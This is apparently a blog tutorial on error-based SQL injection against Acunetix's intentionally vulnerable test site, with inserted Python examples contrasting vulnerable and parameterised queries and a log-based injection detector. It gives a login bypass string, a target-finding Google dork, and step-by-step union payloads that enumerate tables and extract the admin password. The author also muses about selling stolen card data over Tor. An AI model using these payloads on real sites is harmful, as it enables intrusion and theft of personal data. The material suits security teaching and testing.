Sneaker's Stub - The Grey Stuff!

SQL Injection Part 2

In this article we will look at SQL injection and how we can exploit different types of SQL vulnerabilities present on a website. SQL injection is one of the most dangerous ways to get into a site and ruin it totally! The database contains every piece of precious information. It consists of records of credit cards, names with addresses or other personal information, and if such a database gets into the wrong hands, that might be the biggest problem.

Let me give you a scenario of how a malicious hacker can exploit this very dangerous vulnerability and get into your database. Let's say I'm surfing a banking website and find a login or URL-based injection vulnerability on it. First, I would look for the database type, and then I would inject malicious queries on that site. Soon after getting the admin or root password, I could even get a list of credit card numbers, their holders' names and other personal and confidential information. But then again, if I did it, could I get in trouble? Okay, then I could use the Tor network and sell that information to someone else at a nice price so I could get away.

Things like that actually happen and nobody could do anything about that!

In SQL Injection part 1, I gave a really basic idea of how you can find out whether the website you're dealing with has an SQL vulnerability. Now I'm going to tell you how you can query the database for a particular request. First we will look at an error-based scenario so you know what it looks like. I chose an .asp website, but you can choose any site that you want. What's more important is "You should know certain queries in that database language". You can randomly select a site with the Google database hacking technique, but then don't be a fool to pick on some website without a reason (inurl:".asp?id="). You can use php or aspx in place of asp.

Let's do this now.

I am using the Acunetix simulator. They have provided a testing forum at http://testasp.vulnweb.com/; you can go and test your skills on that forum.


Once we enter the website, we take a look at the parameters where we can inject code -> the search, the login and the URL! So let's open the login page and insert a simple always-true query ('or'a'='a) in the username and password fields. You will see that we are logged in.
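Why the always-true input logs in, and what stops it, shown as an added example that is not code from the original article or from the test site. It assumes a login query built by string concatenation; SQLite stands in for the SQL Server backend, and the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the SQL Server backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, upass TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_vulnerable(db, uname, upass):
    # Input is pasted into the SQL text, so a quote in it changes the query:
    # ... WHERE uname = ''or'a'='a' AND upass = ''or'a'='a'
    sql = ("SELECT uname FROM users WHERE uname = '" + uname +
           "' AND upass = '" + upass + "'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, uname, upass):
    # Placeholders send the input as data; it is never parsed as SQL,
    # so the quote characters are compared literally against the columns.
    row = db.execute(
        "SELECT uname FROM users WHERE uname = ? AND upass = ?",
        (uname, upass)).fetchone()
    return row is not None

# The always-true input from the article, typed into both fields.
TAUTOLOGY = "'or'a'='a"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", login_vulnerable(db, TAUTOLOGY, TAUTOLOGY))
    print("safe, tautology:      ", login_safe(db, TAUTOLOGY, TAUTOLOGY))
    print("safe, real password:  ",
          login_safe(db, "admin", "constructed-secret"))
```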

After logging in, let's check the forum threads. Once you click on any of these forums, the URL changes. The "id" in the URL takes a parameter to operate on, and we can inject code here!

Add a single quote (') at the end of the parameter to check whether the website filters unwanted characters or not. This gives us the error stating:

"Microsoft SQL Native Client error '80040e14'

Unclosed quotation mark after the character string ''.

/showforum.asp, line 9".

 

This single quote closes/terminates the parameterized queries stored in the database. Once we add another single quote, an unfiltered environment will give an error.

The next step is finding the number of columns present in the database that we are viewing right now. To do this we will use the order by clause!

http://testasp.vulnweb.com/showforum.asp?id=0 order by 1 --

(--) The dashes comment out whatever further query SQL adds after order by 1, so only the order by 1 query is executed. Comment markers differ between databases. */ and ; are also used to comment out further queries.

Now you have to use order by and increment the number until you get an error like "unknown column" or "column number doesn't exist". I got this error after incrementing the column to 3. The 3rd column doesn't exist, so that means we've got 2 columns here!

"Microsoft SQL Native Client error '80040e14'

The ORDER BY position number 3 is out of range of the number of items in the select list.

/showforum.asp, line 9"

Now we have to check whether the union query works or not! The union query combines two queries to give a single result. So we will use a union all select query to find the vulnerable columns. Now the question arises: what exactly makes a column vulnerable, and how would you know that it is vulnerable?

"The answer is that when we write a query, the data type we are using is a string. In a database, different columns have different data types. But the thing you should know is that you can't write your query in a column taking only integer values. So we have to find a column which uses string as its data type so that we can further query the database."

There are numerous ways in which union would work; here are some of them:

After finding the number of columns in the query is 2 we use:

http://testasp.vulnweb.com/showforum.asp?id=null union all select 1,2--


This query results in 1 being printed on the screen, telling us that column 1 has the data type we require in order to query the database.
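The order by and union steps above depend on two things: the id value reaching the SQL text unchanged, and the database error being shown to the visitor. The following added example (not code from the article or the test site) puts a handler with both weaknesses beside a hardened one; SQLite stands in for SQL Server, and the schema, data and function names are constructed assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed tables; SQLite stands in for the SQL Server backend.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE forums (id INTEGER, name TEXT, descr TEXT);
        INSERT INTO forums VALUES (0, 'General', 'constructed forum');
        CREATE TABLE users (uname TEXT, upass TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

GENERIC_ERROR = "error: request could not be processed"

def showforum_vulnerable(db, raw_id):
    # Numeric context: no quote is needed to change the query, and the
    # database error text goes straight back to the client.
    try:
        return db.execute(
            "SELECT name, descr FROM forums WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)

def showforum_safe(db, raw_id):
    # 1) accept only a short run of ASCII digits, 2) bind the value,
    # 3) return a fixed message instead of the database error text.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return GENERIC_ERROR
    try:
        return db.execute(
            "SELECT name, descr FROM forums WHERE id = ?",
            (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return GENERIC_ERROR

# Inputs taken from the article's own requests.
COLUMN_PROBE = "0 order by 3 --"
UNION_PROBE = "null union all select upass,2 from users where uname='admin'--"

if __name__ == "__main__":
    db = make_db()
    for value in ("0", COLUMN_PROBE, UNION_PROBE):
        print(repr(value))
        print("  vulnerable:", showforum_vulnerable(db, value))
        print("  hardened:  ", showforum_safe(db, value))
```

With the hardened handler, the column-count probe and the union both receive the same fixed message, so neither the select-list size nor any row from another table is disclosed.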

We can also use other forms of union to find this:

http://testasp.vulnweb.com/showforum.asp?id=-1 union all select 1,2--

http://testasp.vulnweb.com/showforum.asp?id=-1 union all select null,2--

http://testasp.vulnweb.com/showforum.asp?id=null union all select 1,null--

http://testasp.vulnweb.com/showforum.asp?id=1 union all select 1,null--

(This query does not work with this test site because it takes column 1's value as the prior value and displays it.)

So now we have a vulnerable column and we are ready to take this to the next level!

Now let's find the database name. We use the following query:

http://testasp.vulnweb.com/showforum.asp?id=null union all select db_name(),2--


Find the version of the database:

http://testasp.vulnweb.com/showforum.asp?id=null union all select @@version,2--


Find databases and list them:

http://testasp.vulnweb.com/showforum.asp?id=null union all select schema_name,2 from information_schema.schemata--

Find table names:

http://testasp.vulnweb.com/showforum.asp?id=-1 UNION SELECT table_name,2 FROM information_schema.tables--

We want a table name with users in it, so I am going to use the LIKE clause to find out whether a table with that name exists or not:

http://testasp.vulnweb.com/showforum.asp?id=null union all select column_name,2 from information_schema.columns where table_name LIKE '%users%' --

I tried '%user%', and it gave me an error, so I searched for users, and it gave me a hint that this table does exist!

There is another way to do this, using the NOT IN clause:

http://testasp.vulnweb.com/showforum.asp?id=null+UNION+SELECT+table_name,2+FROM+information_schema.tables+WHERE+table_name+NOT+IN+('forums')--

The result of the above query would be "posts", which is not what we are looking for, so we are going to collect these table names and then apply the NOT IN clause to find the table which is not shown!

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT+table_name,2+FROM+information_schema.tables+WHERE+table_name+NOT+IN+('forums','threads','posts')--

This query resulted in the users table!


So now we know about the table "users". We need to know the column names of users to get further information, so we will use NOT IN again to find them.

http://testasp.vulnweb.com/showforum.asp?id=null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--

This query gave us avatar as a column name; now we can apply NOT IN to find further column names.

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT%20column_name,2%20FROM%20information_schema.columns%20where%20column_name%20NOT%20IN%20('avatar','descr','email','forumid','id','message','name','postdate','poster','realname','SSMA_TimeStamp','threadid','title','uname')--

This query will give the upass field, which we are interested in!

We know that the admin user exists because the forum has posts which are written by admin. Now we can find out the email, message, desc, realname and upass for the admin!

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT+email,2+FROM+users+where+uname='admin'--


This query will give us the password for admin:

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT upass,2 FROM users where uname='admin'--

The password for admin is "none"!!

This is how you carry out error-based SQL injection on a website. The thing is, you should have knowledge about what you are doing. And I must say that this is not a really good thing to do unless you are going to tell the administrator about the vulnerability on their site.
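Every request in this walkthrough puts something other than a number into the id parameter, which makes the whole sequence easy to spot in web server logs. The following added example (not part of the original article) classifies request URIs by the stages shown above; the sample URIs are constructed, and the indicator names and the assumption that id is always an integer are choices made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request URIs in the style of an access log (not real traffic).
SAMPLE_REQUESTS = [
    "/showforum.asp?id=0",
    "/showforum.asp?id=0'",
    "/showforum.asp?id=0%20order%20by%203--",
    "/showforum.asp?id=-1+UNION+SELECT+table_name,2"
    "+FROM+information_schema.tables--",
    "/showthread.asp?id=12",
]

# Indicators for the stages the article walks through.
SIGNS = [
    ("quote", re.compile(r"'")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
]

def classify(request_uri, param="id"):
    """Return the indicators found in a parameter that should be numeric."""
    query = urlsplit(request_uri).query
    hits = []
    # parse_qs undoes both %20 and + encoding before the patterns run.
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"[0-9]+", value):
            continue
        hits.append("non-numeric")
        hits += [name for name, rx in SIGNS if rx.search(value)]
    return hits

def scan(requests):
    """Map each suspicious request URI to its indicators."""
    found = {}
    for uri in requests:
        hits = classify(uri)
        if hits:
            found[uri] = hits
    return found

if __name__ == "__main__":
    for uri, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits), "<-", uri)
```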

We will look for blind injections later!

Stay Anonymous! :)

Ciao!


